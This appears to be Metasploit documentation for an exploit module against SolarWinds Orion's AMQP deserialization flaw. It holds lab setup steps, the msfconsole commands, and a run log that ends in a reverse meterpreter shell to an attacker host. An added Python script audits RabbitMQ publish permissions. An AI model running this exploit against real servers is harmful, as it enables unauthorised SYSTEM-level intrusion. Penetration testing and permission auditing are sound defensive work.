
Solarwinds Amqp Deserialization

documentation/modules/exploit/windows/misc/solarwinds_amqp_deserialization.md


Vulnerable Application

The SolarWinds Information Service (SWIS) is vulnerable to remote code execution via a crafted message received through the AMQP message queue. An attacker who can authenticate to the AMQP (RabbitMQ) service can publish a message whose body is a serialized .NET object; when SWIS deserializes it, the result is OS command execution as NT AUTHORITY\SYSTEM.

Verification Steps

  1. Install the application (tested SolarWinds Orion NPM versions 2020.2.5 and 2020.2.6)
    1. After installation is complete, create an AMQP account whose credentials you know (the default account is orion).
    2. Open a command prompt in C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin
    3. Run: .\rabbitmqctl.bat add_user "hax" "Password1!"
    4. Run: .\rabbitmqctl.bat set_permissions hax .* .* .*
    5. Run: .\rabbitmqctl.bat set_user_tags hax administrator
  2. Start msfconsole
  3. Do: use exploit/windows/misc/solarwinds_amqp_deserialization
  4. Set RHOSTS, USERNAME, PASSWORD, PAYLOAD and the payload-related options (e.g. LHOST)
  5. Do: run
  6. You should get a shell.
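Whether an AMQP account can publish to SWIS is governed by the RabbitMQ write permission granted with set_permissions above, so a useful follow-up check (and a cleanup check once testing is done) is to audit which accounts hold publish rights. The following Python script is an added example, not part of the module or its documentation: it parses the tab-separated output of rabbitmqctl list_users and rabbitmqctl list_permissions (the sample text is constructed here; the exchange name and every account other than orion are assumptions) and flags any account other than orion whose write pattern would match the given exchange name.

```python
import re
from dataclasses import dataclass

# Constructed sample output in the tab-separated shape that
# "rabbitmqctl list_users" and "rabbitmqctl list_permissions" print.
# The accounts other than orion, and the exchange name used below, are
# assumptions for illustration, not taken from the module documentation.
SAMPLE_USERS = (
    "Listing users ...\n"
    "user\ttags\n"
    "orion\t[administrator]\n"
    "hax\t[administrator]\n"
    "monitor\t[monitoring]\n"
    "reporter\t[]\n"
)

SAMPLE_PERMISSIONS = (
    'Listing permissions for vhost "/" ...\n'
    "user\tconfigure\twrite\tread\n"
    "orion\t.*\t.*\t.*\n"
    "hax\t.*\t.*\t.*\n"
    "monitor\t^$\t^$\t.*\n"
    "reporter\t^$\t^reports-.*$\t^reports-.*$\n"
)


@dataclass(frozen=True)
class Permission:
    user: str
    configure: str
    write: str
    read: str


def _rows(text):
    """Yield tab-separated data rows, skipping the banner and header lines."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("Listing") or line.startswith("user\t"):
            continue
        yield line.split("\t")


def parse_users(text):
    """Map user name -> list of tags from list_users output."""
    users = {}
    for parts in _rows(text):
        name = parts[0]
        tags = parts[1].strip("[]") if len(parts) > 1 else ""
        users[name] = [t.strip() for t in tags.split(",") if t.strip()]
    return users


def parse_permissions(text):
    """Parse list_permissions output into Permission records (user, configure, write, read)."""
    return [Permission(*parts) for parts in _rows(text) if len(parts) == 4]


def can_publish_to(perm, exchange):
    """RabbitMQ grants publish when the user's write regex matches the exchange name.
    The conventional deny pattern is ^$, which matches no real resource."""
    return re.fullmatch(perm.write, exchange) is not None


def unexpected_publishers(users_text, perms_text, exchange, expected=("orion",)):
    """Return sorted names of accounts able to publish to `exchange` that are not expected to."""
    users = parse_users(users_text)
    flagged = []
    for perm in parse_permissions(perms_text):
        if perm.user in expected or perm.user not in users:
            continue
        if can_publish_to(perm, exchange):
            flagged.append(perm.user)
    return sorted(flagged)


if __name__ == "__main__":
    # "example-exchange" is a placeholder; substitute the exchange SWIS consumes from.
    tags = parse_users(SAMPLE_USERS)
    for name in unexpected_publishers(SAMPLE_USERS, SAMPLE_PERMISSIONS, "example-exchange"):
        print(f"unexpected publisher: {name} tags={tags.get(name)}")
```

Feed it the real output of the two rabbitmqctl commands (run from the same sbin directory as the steps above) and the name of the exchange SWIS consumes from; any account it lists besides orion is one that could deliver a message to SWIS, which is exactly the test account created above and should be removed with rabbitmqctl delete_user when testing is finished.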

Options

Scenarios

SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64

msf > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400

meterpreter >